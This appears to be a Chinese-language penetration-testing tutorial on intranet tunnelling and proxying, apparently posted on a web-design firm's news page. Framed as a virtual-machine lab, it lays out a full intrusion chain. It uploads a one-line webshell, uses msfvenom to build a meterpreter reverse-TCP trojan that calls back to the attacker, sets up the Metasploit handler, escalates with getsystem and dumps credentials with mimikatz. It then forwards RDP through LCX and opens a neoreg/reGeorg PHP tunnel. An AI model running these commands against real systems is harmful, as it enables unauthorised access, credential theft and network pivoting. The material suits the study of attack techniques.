资讯动态

内网隧道与代理

发布时间:2026/8/16 22:29:22 来源:尧图企业网站定制
首先使用虚拟机搭建攻击环境三台电脑一台攻击机 外网一台被攻击的机器WEB服务器内网环境两块网卡外网内网一台KALI 外网 与攻击机处于同一网段------------------------------------------------------------------进入攻击的两种方法一是使用蚁剑二是使用MSF先来讲第一种方法向攻击中的网站服务器上传一句话木马然后使用蚁剑连接到这个一句话木马上。使用MSF生成SU.EXE木马。使用蚁剑将SU.EXE上传到被攻击的服务器上。---------------如果使用MSF,则在KALI中执行如下代码msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.11 lport4444 -f exe su.exe--在KALI本机上生成反向连接反向连接到本机IP 端口4444上的木马su.exemsfconsole--启动MSFuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcp--设置PAYLOADset lhost 10.0.0.11set lport 4444--设置反向连接的IP和端口然后启动连接。run启动后只要被攻击的服务品上SU.EXE木马执行那么在MSF中将会连接。在MSF中执行以下命令oad mimikatz 加载mimikatz工具getsystem 提权getuid 查看权限creds_all 一键抓取凭证--creds_all获取到 被攻击服务器密码然后使用LCX代理转发工具将选程连接到被攻击的服务器上。首选使用蚁剑上传LCX到被攻击服务器上和攻击机上LCX:纯端口转发尝试转发目标主机3389端口1、开启3389服务 打开的是远程桌面连接端口2、攻击机执行lcx.exe -listen 2222 1234#监听本地的2222端口将流量转发到12343、Webshell上执行lcx.exe -slave 10.0.0.1 2222 127.0.0.1 3389#将本机3389端口流量转 发到公网ip的2222端口上去在攻击上执行MSTSC127.0.0.11234 则进入到选程桌面可连接被攻击的服务器。至此LCX纯端口转发的实验已完成。----------------------------------------------------reGeorgProxifier 打通内网1、开启2003的IISweb服务2、生成并上传php后门python neoreg.py generate -k 1113、配置代理开启proxifier,代理服务器127.0.0.1:10804、neoreg添加隧道python neoreg.py -k 111 -u http://10.0.0.129:90/pikachu/tunnel.php额外添加python代理规则

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价